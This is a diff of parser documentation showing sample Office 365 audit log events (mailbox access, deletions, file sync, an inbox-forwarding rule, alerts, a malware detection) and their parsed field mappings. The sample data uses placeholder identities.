(15.20.4200.000)\\r\\n\",\"SessionId\":\"dcdad6b2-f279-48c6-9ed8-3df0ffde4ece\",\"Folders\":[{\"FolderItems\":[{\"InternetMessageId\":\"\",\"Sensitivity\":\"defa4170-0d19-0005-0004-bc88714345d2\",\"SizeInBytes\":3476},{\"InternetMessageId\":\"\",\"SizeInBytes\":4871},{\"InternetMessageId\":\"\",\"SizeInBytes\":4873}],\"Id\":\"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEPAAAB\",\"Path\":\"\\\\Brouillons\"}],\"OperationCount\":3}\r", + "message": "{\"CreationTime\": \"2023-09-15T18:16:53\", \"Id\": \"461a38ce-fc36-4a4d-b73e-643262cc063f\", \"Operation\": \"MailItemsAccessed\", \"OrganizationId\": \"80494e66-e53a-48eb-8e52-c6ba3b1ddd2c\", \"RecordType\": 50, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"100320029D9C5179\", \"UserType\": 0, \"Version\": 1, \"Workload\": 
\"Exchange\", \"UserId\": \"NestorW@example.onmicrosoft.com\", \"AppId\": \"00000002-0000-0ff1-ce00-000000000000\", \"ClientIPAddress\": \"2a01:e0a:4ed:f6d0:49b6:317d:859f:edd7\", \"ClientInfoString\": \"Client=OWA;Action=ViaProxy\", \"ExternalAccess\": false, \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1-5-21-2647618131-1242773297-2752983135-27922907\", \"MailboxGuid\": \"03d9e949-cbc1-4dd2-b7ba-8a1d1e0207b5\", \"MailboxOwnerSid\": \"S-1-5-21-2647618131-1242773297-2752983135-27922907\", \"MailboxOwnerUPN\": \"NestorW@example.onmicrosoft.com\", \"OperationProperties\": [{\"Name\": \"MailAccessType\", \"Value\": \"Bind\"}, {\"Name\": \"IsThrottled\", \"Value\": \"False\"}], \"OrganizationName\": \"example.onmicrosoft.com\", \"OriginatingServer\": \"AM0PR07MB5763 (15.20.4200.000)\\r\\n\", \"SessionId\": \"dcdad6b2-f279-48c6-9ed8-3df0ffde4ece\", \"Folders\": [{\"FolderItems\": [{\"InternetMessageId\": \"\", \"Sensitivity\": \"defa4170-0d19-0005-0004-bc88714345d2\", \"SizeInBytes\": 3476}, {\"InternetMessageId\": \"\", \"SizeInBytes\": 4871}, {\"InternetMessageId\": \"\", \"SizeInBytes\": 4873}], \"Id\": \"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEPAAAB\", \"Path\": \"\\\\Brouillons\"}], \"OperationCount\": 3}", "event": { "action": "MailItemsAccessed", "code": "50", @@ -732,6 +938,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "id": "80494e66-e53a-48eb-8e52-c6ba3b1ddd2c" }, "related": { + "ip": [ + "2a01:e0a:4ed:f6d0:49b6:317d:859f:edd7" + ], "user": [ "NestorW@example.onmicrosoft.com" ] @@ -739,6 +948,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "service": { "name": "Exchange" }, + "source": { + "address": "2a01:e0a:4ed:f6d0:49b6:317d:859f:edd7", + "ip": "2a01:e0a:4ed:f6d0:49b6:317d:859f:edd7" + }, "user": { "email": "NestorW@example.onmicrosoft.com", "id": "100320029D9C5179", 
@@ -754,7 +967,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2023-09-15T18:11:42\",\"Id\":\"d0d7820c-cdbe-4524-bf75-08dbb61736bf\",\"Operation\":\"HardDelete\",\"OrganizationId\":\"80494e66-e53a-48eb-8e52-c6ba3b1ddd2c\",\"RecordType\":3,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"100320029D9C5179\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"12.34.56.78\",\"UserId\":\"NestorW@example.onmicrosoft.com\",\"AppId\":\"00000002-0000-0ff1-ce00-000000000000\",\"ClientIPAddress\":\"12.34.56.78\",\"ClientInfoString\":\"Client=OWA;Action=ViaProxy\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-5-21-2647618131-1242773297-2752983135-27922907\",\"MailboxGuid\":\"03d9e949-cbc1-4dd2-b7ba-8a1d1e0207b5\",\"MailboxOwnerSid\":\"S-1-5-21-2647618131-1242773297-2752983135-27922907\",\"MailboxOwnerUPN\":\"NestorW@example.onmicrosoft.com\",\"OrganizationName\":\"example.onmicrosoft.com\",\"OriginatingServer\":\"AM0PR07MB5763 (15.20.4200.000)\\r\\n\",\"SessionId\":\"dcdad6b2-f279-48c6-9ed8-3df0ffde4ece\",\"AffectedItems\":[{\"Id\":\"RgAAAABxSjbeIoBUT6MlFIM9cqcFBwCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAACxmw0Q8U/kQIyFE2Uk+mwoAABVzgKRAAAJ\",\"InternetMessageId\":\"\",\"ParentFolder\":{\"Id\":\"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAAAB\",\"Path\":\"\\\\Recoverable Items\\\\Deletions\"},\"Subject\":\"\"}],\"CrossMailboxOperation\":false,\"Folder\":{\"Id\":\"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAAAB\",\"Path\":\"\\\\Recoverable Items\\\\Deletions\"}}\r\n\r", + "message": "{\"CreationTime\": \"2023-09-15T18:11:42\", \"Id\": \"d0d7820c-cdbe-4524-bf75-08dbb61736bf\", \"Operation\": \"HardDelete\", \"OrganizationId\": \"80494e66-e53a-48eb-8e52-c6ba3b1ddd2c\", \"RecordType\": 3, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"100320029D9C5179\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"Exchange\", 
\"ClientIP\": \"12.34.56.78\", \"UserId\": \"NestorW@example.onmicrosoft.com\", \"AppId\": \"00000002-0000-0ff1-ce00-000000000000\", \"ClientIPAddress\": \"12.34.56.78\", \"ClientInfoString\": \"Client=OWA;Action=ViaProxy\", \"ExternalAccess\": false, \"InternalLogonType\": 0, \"LogonType\": 0, \"LogonUserSid\": \"S-1-5-21-2647618131-1242773297-2752983135-27922907\", \"MailboxGuid\": \"03d9e949-cbc1-4dd2-b7ba-8a1d1e0207b5\", \"MailboxOwnerSid\": \"S-1-5-21-2647618131-1242773297-2752983135-27922907\", \"MailboxOwnerUPN\": \"NestorW@example.onmicrosoft.com\", \"OrganizationName\": \"example.onmicrosoft.com\", \"OriginatingServer\": \"AM0PR07MB5763 (15.20.4200.000)\\r\\n\", \"SessionId\": \"dcdad6b2-f279-48c6-9ed8-3df0ffde4ece\", \"AffectedItems\": [{\"Id\": \"RgAAAABxSjbeIoBUT6MlFIM9cqcFBwCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAACxmw0Q8U/kQIyFE2Uk+mwoAABVzgKRAAAJ\", \"InternetMessageId\": \"\", \"ParentFolder\": {\"Id\": \"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAAAB\", \"Path\": \"\\\\Recoverable Items\\\\Deletions\"}, \"Subject\": \"\"}], \"CrossMailboxOperation\": false, \"Folder\": {\"Id\": \"LgAAAABxSjbeIoBUT6MlFIM9cqcFAQCxmw0Q8U/kQIyFE2Uk+mwoAAAAAAEbAAAB\", \"Path\": \"\\\\Recoverable Items\\\\Deletions\"}}", "event": { "action": "HardDelete", "category": [ 
@@ -983,60 +1196,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "office365": { "exchange": { - "mailbox_guid": "8208550a-4001-439d-a9f6-e95d76767507", - "modified_properties": [ - "AllAttachmentsHidden", - "AppointmentRecurring", - "AttendeeCriticalChangeTime", - "BirthdayContactAttributionDisplayName", - "BirthdayLocal", - "CreationTime", - "DisplayName", - "HtmlBody", - "ItemClass", - "Location", - "MapiEndTime", - "MapiIsAllDayEvent", - "MapiPREndDate", - "MapiPRStartDate", - "MapiStartTime", - "MapiSubject", - "NormalizedSubjectInternal", - "PartnerNetworkId", - "PartnerNetworkUserId", - "ReceivedByAddrType", - "ReceivedByEmailAddress", - "ReceivedByEntryId", - "ReceivedByName", - "ReceivedBySmtpAddress", - "ReceivedTime", - "RecipientCollection", - "ReplyForwardStatus", - "RtfBody", - "SendRichInfo", - "SenderAddressType", - "SenderDisplayName", - "SenderEmailAddress", - "SenderEntryId", - "SenderSID", - "SenderSmtpAddress", - "SentRepresentingDisplayName", - "SentRepresentingEmailAddress", - "SentRepresentingEntryId", - "SentRepresentingSID", - "SentRepresentingSmtpAddress", - "SentRepresentingType", - "SentTime", - "SipUri", - "SubjectPrefixInternal", - "TextBody", - "TimeZone", - "TimeZoneBlob", - "TimeZoneDefinitionEnd", - "TimeZoneDefinitionRecurring", - "TimeZoneDefinitionStart", - "When" - ] + "mailbox_guid": "8208550a-4001-439d-a9f6-e95d76767507" }, "record_type": 2, "result_status": "Succeeded", 
@@ -1174,7 +1334,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"AppAccessContext\":{\"AADSessionId\":\"xxxx-xxx-xxx-xxx\",\"ClientAppName\":\"WebExcel\",\"CorrelationId\":\"xxx-xxx-xxx-xxx\"},\"CreationTime\":\"2024-02-22T16:06:53\",\"Id\":\"xxx-xxx-xxx-xxx\",\"Operation\":\"FileModifiedExtended\",\"OrganizationId\":\"xxx-xxx-xxx-xxx\",\"RecordType\":6,\"UserKey\":\"adresse@test.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"SharePoint\",\"ClientIP\":\"0.0.0.0\",\"UserId\":\"user@mail.com\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"\",\"BrowserVersion\":\"\",\"CorrelationId\":\"xxx-xxx-xxx-xxx\",\"EventSource\":\"SharePoint\",\"IsManagedDevice\":false,\"ItemType\":\"File\",\"ListId\":\"xxx-xxx-xxx-xxx\",\"ListItemUniqueId\":\"xxx-xxx-xxx-xxx\",\"Platform\":\"OfficeCollaborationService\",\"Site\":\"xx-xxx-xx-xx\",\"UserAgent\":\"Useragentname\",\"WebId\":\"xxx-xx-xxx-xxx\",\"DeviceDisplayName\":\"0.0.0.0\",\"FileSizeBytes\":906087,\"HighPriorityMediaProcessing\":false,\"ListBaseType\":1,\"ListServerTemplate\":101,\"SourceFileExtension\":\"xlsx\",\"SiteUrl\":\"https://sharepoint.com/sites/filepath/\",\"SourceRelativeUrl\":\"Folder/Path\",\"SourceFileName\":\"FILENAME.xlsx\",\"ApplicationDisplayName\":\"WebExcel\",\"ObjectId\":\"https://site.file.name.xlsx\"}", + "message": "{\"AppAccessContext\": {\"AADSessionId\": \"xxxx-xxx-xxx-xxx\", \"ClientAppName\": \"WebExcel\", \"CorrelationId\": \"xxx-xxx-xxx-xxx\"}, \"CreationTime\": \"2024-02-22T16:06:53\", \"Id\": \"xxx-xxx-xxx-xxx\", \"Operation\": \"FileModifiedExtended\", \"OrganizationId\": \"xxx-xxx-xxx-xxx\", \"RecordType\": 6, \"UserKey\": \"adresse@test.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"SharePoint\", \"ClientIP\": \"0.0.0.0\", \"UserId\": \"user@mail.com\", \"AuthenticationType\": \"OAuth\", \"BrowserName\": \"\", \"BrowserVersion\": \"\", \"CorrelationId\": \"xxx-xxx-xxx-xxx\", \"EventSource\": \"SharePoint\", 
\"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"xxx-xxx-xxx-xxx\", \"ListItemUniqueId\": \"xxx-xxx-xxx-xxx\", \"Platform\": \"OfficeCollaborationService\", \"Site\": \"xx-xxx-xx-xx\", \"UserAgent\": \"Useragentname\", \"WebId\": \"xxx-xx-xxx-xxx\", \"DeviceDisplayName\": \"0.0.0.0\", \"FileSizeBytes\": 906087, \"HighPriorityMediaProcessing\": false, \"ListBaseType\": 1, \"ListServerTemplate\": 101, \"SourceFileExtension\": \"xlsx\", \"SiteUrl\": \"https://sharepoint.com/sites/filepath/\", \"SourceRelativeUrl\": \"Folder/Path\", \"SourceFileName\": \"FILENAME.xlsx\", \"ApplicationDisplayName\": \"WebExcel\", \"ObjectId\": \"https://site.file.name.xlsx\"}", "event": { "action": "FileModifiedExtended", "category": [ 
@@ -1277,7 +1437,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"AppAccessContext\":{\"AADSessionId\":\"0e042318-7c78-4acb-ae00-5ee74465bca3\",\"CorrelationId\":\"c299a0a0-14da-428a-b08d-481d562298cb\",\"UniqueTokenId\":\"0000000000000000000000\"},\"CreationTime\":\"2022-06-10T12:00:14\",\"Id\":\"7c13b5d5-aa8d-48d1-b3d1-5f4b657136ba\",\"Operation\":\"FileSyncDownloadedFull\",\"OrganizationId\":\"2d7585dc-97bc-4494-b98c-79f2a4946931\",\"RecordType\":6,\"UserKey\":\"i:0h.f|membership|0000000000000000@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"SharePoint\",\"ClientIP\":\"1.2.3.4\",\"ObjectId\":\"https://company.sharepoint.com/sites/shared/public/assets/website/logo.png\",\"UserId\":\"marketing@company.com\",\"CorrelationId\":\"4b25e3d9-1e4f-4c62-a544-da747449f144\",\"EventSource\":\"SharePoint\",\"ItemType\":\"File\",\"ListId\":\"ca07dda5-0cdc-4399-94a6-303a7aa8ac00\",\"ListItemUniqueId\":\"ab5a159c-c8fd-409c-a48f-524c29df0341\",\"Site\":\"1a53ae0f-8405-42ec-8c43-724101fd34a2\",\"UserAgent\":\"Microsoft SkyDriveSync 22.099.0508.0001 ship; Windows NT 10.0 (19043)\",\"WebId\":\"ba71b4fe-22e8-41cf-9eaf-48b1787bad16\",\"MachineDomainInfo\":\"f059d209-e819-402b-a391-4941ff3860c6\",\"MachineId\":\"884ecccb-1e44-4dd4-a2b5-b60517893ce0\",\"FileSyncBytesCommitted\":\"1344200\",\"HighPriorityMediaProcessing\":false,\"SourceFileExtension\":\"png\",\"SiteUrl\":\"https://company.sharepoint.com/sites/shared\",\"SourceFileName\":\"logo.png\",\"SourceRelativeUrl\":\"public/assets/website\"}", + "message": "{\"AppAccessContext\": {\"AADSessionId\": \"0e042318-7c78-4acb-ae00-5ee74465bca3\", \"CorrelationId\": \"c299a0a0-14da-428a-b08d-481d562298cb\", \"UniqueTokenId\": \"0000000000000000000000\"}, \"CreationTime\": \"2022-06-10T12:00:14\", \"Id\": \"7c13b5d5-aa8d-48d1-b3d1-5f4b657136ba\", \"Operation\": \"FileSyncDownloadedFull\", \"OrganizationId\": \"2d7585dc-97bc-4494-b98c-79f2a4946931\", \"RecordType\": 6, 
\"UserKey\": \"i:0h.f|membership|0000000000000000@live.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"SharePoint\", \"ClientIP\": \"1.2.3.4\", \"ObjectId\": \"https://company.sharepoint.com/sites/shared/public/assets/website/logo.png\", \"UserId\": \"marketing@company.com\", \"CorrelationId\": \"4b25e3d9-1e4f-4c62-a544-da747449f144\", \"EventSource\": \"SharePoint\", \"ItemType\": \"File\", \"ListId\": \"ca07dda5-0cdc-4399-94a6-303a7aa8ac00\", \"ListItemUniqueId\": \"ab5a159c-c8fd-409c-a48f-524c29df0341\", \"Site\": \"1a53ae0f-8405-42ec-8c43-724101fd34a2\", \"UserAgent\": \"Microsoft SkyDriveSync 22.099.0508.0001 ship; Windows NT 10.0 (19043)\", \"WebId\": \"ba71b4fe-22e8-41cf-9eaf-48b1787bad16\", \"MachineDomainInfo\": \"f059d209-e819-402b-a391-4941ff3860c6\", \"MachineId\": \"884ecccb-1e44-4dd4-a2b5-b60517893ce0\", \"FileSyncBytesCommitted\": \"1344200\", \"HighPriorityMediaProcessing\": false, \"SourceFileExtension\": \"png\", \"SiteUrl\": \"https://company.sharepoint.com/sites/shared\", \"SourceFileName\": \"logo.png\", \"SourceRelativeUrl\": \"public/assets/website\"}", "event": { "action": "FileSyncDownloadedFull", "category": [ 
@@ -1381,7 +1541,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"Id\":\"40094389-7baf-a3ba-5acc-2773c002cfbe\",\"RecordType\":22,\"CreationTime\":\"2022-09-07T12:22:07\",\"Operation\":\"FileVisited\",\"OrganizationId\":\"12b674a1-3497-4997-b4ab-2a40bf0e5139\",\"UserType\":0,\"UserKey\":\"10032001cf3045ad\",\"Workload\":\"Yammer\",\"ResultStatus\":\"TRUE\",\"ObjectId\":\"Pix_C'est la rentre!.png\",\"ClientIP\":\"2503:1026:c0a:70::5\",\"UserId\":\"Frodon.Saquet@comte.com\",\"ActorYammerUserId\":1315924230144,\"ActorUserId\":\"Frodon.Saquet@comte.com\",\"YammerNetworkId\":6358000,\"Version\":1,\"FileId\":1439262310400,\"FileName\":\"Pix_C'est la rentre!.png\",\"VersionId\":1460243079168}", + "message": "{\"Id\": \"40094389-7baf-a3ba-5acc-2773c002cfbe\", \"RecordType\": 22, \"CreationTime\": \"2022-09-07T12:22:07\", \"Operation\": \"FileVisited\", \"OrganizationId\": \"12b674a1-3497-4997-b4ab-2a40bf0e5139\", \"UserType\": 0, \"UserKey\": \"10032001cf3045ad\", \"Workload\": \"Yammer\", \"ResultStatus\": \"TRUE\", \"ObjectId\": \"Pix_C'est la rentre!.png\", \"ClientIP\": \"2503:1026:c0a:70::5\", \"UserId\": \"Frodon.Saquet@comte.com\", \"ActorYammerUserId\": 1315924230144, \"ActorUserId\": \"Frodon.Saquet@comte.com\", \"YammerNetworkId\": 6358000, \"Version\": 1, \"FileId\": 1439262310400, \"FileName\": \"Pix_C'est la rentre!.png\", \"VersionId\": 1460243079168}", "event": { "action": "FileVisited", "category": [ 
@@ -1444,7 +1604,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2023-12-13T10:08:21\",\"Id\":\"xxxxxxxxx\",\"Operation\":\"EditForm\",\"OrganizationId\":\"xxxxxxxxx\",\"RecordType\":66,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxxxxxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftForms\",\"ClientIP\":\"0.0.0.0\",\"ObjectId\":\"xxxxxxx\",\"UserId\":\"user@test.io\",\"ActivityParameters\":\"{\\\"EditOperation\\\":\\\"QuestionUpdated\\\"}\",\"FormId\":\"xxxxxxx\",\"FormName\":\"FormNameValue\\n\\n\",\"FormType\":1,\"FormsUserType\":1,\"SourceApp\":\"ms-formweb\"}", + "message": "{\"CreationTime\": \"2023-12-13T10:08:21\", \"Id\": \"xxxxxxxxx\", \"Operation\": \"EditForm\", \"OrganizationId\": \"xxxxxxxxx\", \"RecordType\": 66, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"xxxxxxxxx\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftForms\", \"ClientIP\": \"0.0.0.0\", \"ObjectId\": \"xxxxxxx\", \"UserId\": \"user@test.io\", \"ActivityParameters\": \"{\\\"EditOperation\\\":\\\"QuestionUpdated\\\"}\", \"FormId\": \"xxxxxxx\", \"FormName\": \"FormNameValue\\n\\n\", \"FormType\": 1, \"FormsUserType\": 1, \"SourceApp\": \"ms-formweb\"}", "event": { "action": "EditForm", "code": "66", 
@@ -1505,7 +1665,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2023-05-24T15:10:53\",\"Id\":\"9cf2a1f7-90bc-494b-2784-08db5c691133\",\"Operation\":\"New-InboxRule\",\"OrganizationId\":\"49c2f50d-d36c-4b88-8511-55ce3ea9e53f\",\"RecordType\":1,\"ResultStatus\":\"True\",\"UserKey\":\"100320028D9C5197\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"240.157.135.119:63070\",\"ObjectId\":\"EURPR07A010.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/example.onmicrosoft.com/bc1b1df3-f861-4aec-bf7c-40ce5b5566c1\\\\RULE_NAME\",\"UserId\":\"RobertP@example.onmicrosoft.com\",\"AppId\":\"00000002-0000-0ff1-ce00-000000000000\",\"ClientAppId\":\"\",\"ExternalAccess\":false,\"OrganizationName\":\"example.onmicrosoft.com\",\"OriginatingServer\":\"AM0PR07MB5763 (15.20.6411.029)\",\"Parameters\":[{\"Name\":\"ForwardTo\",\"Value\":\"bob@example.org\"},{\"Name\":\"Force\",\"Value\":\"False\"},{\"Name\":\"AlwaysDeleteOutlookRulesBlob\",\"Value\":\"False\"},{\"Name\":\"RedirectTo\",\"Value\":\"joe@example.org\"},{\"Name\":\"From\",\"Value\":\"alice@example.org\"},{\"Name\":\"Name\",\"Value\":\"RULE_NAME\"},{\"Name\":\"DeleteMessage\",\"Value\":\"True\"},{\"Name\":\"FromAddressContainsWords\",\"Value\":\"@example.org\"},{\"Name\":\"MarkAsRead\",\"Value\":\"True\"},{\"Name\":\"StopProcessingRules\",\"Value\":\"True\"},{\"Name\":\"SubjectOrBodyContainsWords\",\"Value\":\"keyword\"},{\"Name\":\"MoveToFolder\",\"Value\":\"Historique des conversations\"}],\"SessionId\":\"984c0958-0631-4b90-b116-15094fc36847\"}\r\n\r", + "message": "{\"CreationTime\": \"2023-05-24T15:10:53\", \"Id\": \"9cf2a1f7-90bc-494b-2784-08db5c691133\", \"Operation\": \"New-InboxRule\", \"OrganizationId\": \"49c2f50d-d36c-4b88-8511-55ce3ea9e53f\", \"RecordType\": 1, \"ResultStatus\": \"True\", \"UserKey\": \"100320028D9C5197\", \"UserType\": 2, \"Version\": 1, \"Workload\": \"Exchange\", \"ClientIP\": 
\"240.157.135.119:63070\", \"ObjectId\": \"EURPR07A010.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/example.onmicrosoft.com/bc1b1df3-f861-4aec-bf7c-40ce5b5566c1\\\\RULE_NAME\", \"UserId\": \"RobertP@example.onmicrosoft.com\", \"AppId\": \"00000002-0000-0ff1-ce00-000000000000\", \"ClientAppId\": \"\", \"ExternalAccess\": false, \"OrganizationName\": \"example.onmicrosoft.com\", \"OriginatingServer\": \"AM0PR07MB5763 (15.20.6411.029)\", \"Parameters\": [{\"Name\": \"ForwardTo\", \"Value\": \"bob@example.org\"}, {\"Name\": \"Force\", \"Value\": \"False\"}, {\"Name\": \"AlwaysDeleteOutlookRulesBlob\", \"Value\": \"False\"}, {\"Name\": \"RedirectTo\", \"Value\": \"joe@example.org\"}, {\"Name\": \"From\", \"Value\": \"alice@example.org\"}, {\"Name\": \"Name\", \"Value\": \"RULE_NAME\"}, {\"Name\": \"DeleteMessage\", \"Value\": \"True\"}, {\"Name\": \"FromAddressContainsWords\", \"Value\": \"@example.org\"}, {\"Name\": \"MarkAsRead\", \"Value\": \"True\"}, {\"Name\": \"StopProcessingRules\", \"Value\": \"True\"}, {\"Name\": \"SubjectOrBodyContainsWords\", \"Value\": \"keyword\"}, {\"Name\": \"MoveToFolder\", \"Value\": \"Historique des conversations\"}], \"SessionId\": \"984c0958-0631-4b90-b116-15094fc36847\"}", "event": { "action": "New-InboxRule", "code": "1", 
@@ -1665,7 +1825,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2024-02-22T09:56:48\",\"Id\":\"0e042318-7c78-4acb-ae00-5ee74465bca3\",\"Operation\":\"AlertUpdated\",\"OrganizationId\":\"2d7585dc-97bc-4494-b98c-79f2a4946931\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\",\"ObjectId\":\"c299a0a0-14da-428a-b08d-481d562298cb\",\"UserId\":\"SecurityComplianceAlerts\",\"AlertId\":\"c299a0a0-14da-428a-b08d-481d562298cb\",\"AlertLinks\":[{\"AlertLinkHref\":\"\"}],\"AlertType\":\"Custom\",\"Category\":\"ThreatManagement\",\"Comments\":\"New alert\",\"Data\":\"{\\\"ts\\\":\\\"2024-02-22 09:46:54Z\\\",\\\"te\\\":\\\"2024-02-22 09:46:54Z\\\",\\\"an\\\":\\\"Mass download by a single user\\\",\\\"ad\\\":\\\"Activity policy 'Mass download by a single user' was triggered by 'Anakin SKYWALKER'\\\",\\\"f3u\\\":\\\"anakin.skywalker@gondor.com\\\",\\\"alk\\\":\\\"https://gondor.portal.cloudappsecurity.com/#/alerts/79d71811t27fe160149dcd56\\\",\\\"plk\\\":\\\"https://gondor.portal.cloudappsecurity.com/#/policy/?id=eq(5f391720dd4e64e3db757c35,)\\\",\\\"mat\\\":\\\"MCAS_ALERT_CABINET_EVENT_MATCH_AUDIT\\\"}\",\"Name\":\"Mass download by a single user\",\"PolicyId\":\"8697dfdc-965d-67f7-bb37-b2551b296c04\",\"Severity\":\"High\",\"Source\":\"Cloud App Security\",\"Status\":\"Active\"}", + "message": "{\"CreationTime\": \"2024-02-22T09:56:48\", \"Id\": \"0e042318-7c78-4acb-ae00-5ee74465bca3\", \"Operation\": \"AlertUpdated\", \"OrganizationId\": \"2d7585dc-97bc-4494-b98c-79f2a4946931\", \"RecordType\": 40, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"SecurityComplianceAlerts\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"SecurityComplianceCenter\", \"ObjectId\": \"c299a0a0-14da-428a-b08d-481d562298cb\", \"UserId\": \"SecurityComplianceAlerts\", \"AlertId\": 
\"c299a0a0-14da-428a-b08d-481d562298cb\", \"AlertLinks\": [{\"AlertLinkHref\": \"\"}], \"AlertType\": \"Custom\", \"Category\": \"ThreatManagement\", \"Comments\": \"New alert\", \"Data\": \"{\\\"ts\\\":\\\"2024-02-22 09:46:54Z\\\",\\\"te\\\":\\\"2024-02-22 09:46:54Z\\\",\\\"an\\\":\\\"Mass download by a single user\\\",\\\"ad\\\":\\\"Activity policy 'Mass download by a single user' was triggered by 'Anakin SKYWALKER'\\\",\\\"f3u\\\":\\\"anakin.skywalker@gondor.com\\\",\\\"alk\\\":\\\"https://gondor.portal.cloudappsecurity.com/#/alerts/79d71811t27fe160149dcd56\\\",\\\"plk\\\":\\\"https://gondor.portal.cloudappsecurity.com/#/policy/?id=eq(5f391720dd4e64e3db757c35,)\\\",\\\"mat\\\":\\\"MCAS_ALERT_CABINET_EVENT_MATCH_AUDIT\\\"}\", \"Name\": \"Mass download by a single user\", \"PolicyId\": \"8697dfdc-965d-67f7-bb37-b2551b296c04\", \"Severity\": \"High\", \"Source\": \"Cloud App Security\", \"Status\": \"Active\"}", "event": { "action": "AlertUpdated", "category": [ @@ -1689,6 +1849,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "alert": { "category": "ThreatManagement", "display_name": "Mass download by a single user", + "id": "c299a0a0-14da-428a-b08d-481d562298cb", "severity": "High", "source": "Cloud App Security", "status": "Active" @@ -1708,7 +1869,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "user": [ - "SecurityComplianceAlerts" + "anakin.skywalker" ] }, "rule": { @@ -1723,8 +1884,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { + "domain": "gondor.com", + "email": "anakin.skywalker@gondor.com", "id": "SecurityComplianceAlerts", - "name": "SecurityComplianceAlerts" + "name": "anakin.skywalker" } } 
@@ -1803,7 +1966,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2022-07-07T22:38:49\",\"Id\":\"266f5962-ffad-4fce-a101-3197581af3d4\",\"Operation\":\"AtpDetection\",\"OrganizationId\":\"7f7e5b97-b780-473c-9c76-9182a9d7f2b4\",\"RecordType\":47,\"UserKey\":\"ThreatIntel\",\"UserType\":4,\"Version\":1,\"Workload\":\"ThreatIntelligence\",\"UserId\":\"people@example.org\",\"DetectionDate\":\"2022-07-07T22:38:11\",\"DetectionMethod\":\"AntiMalware\",\"EventDeepLink\":\"https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=MalwareContent&query-Id=2ab4791e-fdd4-42f9-ad3c-c54ef7a4d548\",\"FileData\":{\"DocumentId\":\"03254108-f682-417d-f3e6-08da605bf091\",\"FileName\":\"malware\",\"FilePath\":\"https://example.sharepoint.com/personal/people_example_org/Documents/malware\",\"FileSize\":\"12345\",\"FileVerdict\":1,\"MalwareFamily\":\"iPhoneOS/Vortex.C\",\"SHA256\":\"SnltYq0lbVwFlAIf+lQugPXaMcDNV9t9pN/Zkhx7hQ8=\"},\"LastModifiedBy\":\"people@example.org\",\"LastModifiedDate\":\"2022-01-01T13:00:53\",\"SourceWorkload\":1}\n", + "message": "{\"CreationTime\": \"2022-07-07T22:38:49\", \"Id\": \"266f5962-ffad-4fce-a101-3197581af3d4\", \"Operation\": \"AtpDetection\", \"OrganizationId\": \"7f7e5b97-b780-473c-9c76-9182a9d7f2b4\", \"RecordType\": 47, \"UserKey\": \"ThreatIntel\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"ThreatIntelligence\", \"UserId\": \"people@example.org\", \"DetectionDate\": \"2022-07-07T22:38:11\", \"DetectionMethod\": \"AntiMalware\", \"EventDeepLink\": \"https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=MalwareContent&query-Id=2ab4791e-fdd4-42f9-ad3c-c54ef7a4d548\", \"FileData\": {\"DocumentId\": \"03254108-f682-417d-f3e6-08da605bf091\", \"FileName\": \"malware\", \"FilePath\": \"https://example.sharepoint.com/personal/people_example_org/Documents/malware\", \"FileSize\": \"12345\", \"FileVerdict\": 1, 
